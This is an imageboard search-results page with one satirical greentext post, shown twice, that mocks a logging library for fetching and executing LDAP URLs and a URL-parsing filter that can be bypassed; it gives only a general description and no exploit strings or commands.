Search Results
6/17/2025, 6:03:02 PM
>>105621959
>i used a third party library for printing a log to stdout
>that third party library included a million features i knew nothing about
>so that libary parsed ldap urls and fetched and executed them
>i discovered this a decade later
>its a remote execution vulnerability... but it kinda isn't because it is an intentional feature of the library i used
>i reacted to this by using a different library to parse parts of the string before it gets parsed by the logger to filter it
>but that different library implemented the url differently
>so someone could inject urls into the urls and and use the library parser to get something to the other parser library used by that logging library
or you could have just printed your log to stdout
>i used a third party library for printing a log to stdout
>that third party library included a million features i knew nothing about
>so that libary parsed ldap urls and fetched and executed them
>i discovered this a decade later
>its a remote execution vulnerability... but it kinda isn't because it is an intentional feature of the library i used
>i reacted to this by using a different library to parse parts of the string before it gets parsed by the logger to filter it
>but that different library implemented the url differently
>so someone could inject urls into the urls and and use the library parser to get something to the other parser library used by that logging library
or you could have just printed your log to stdout
Page 1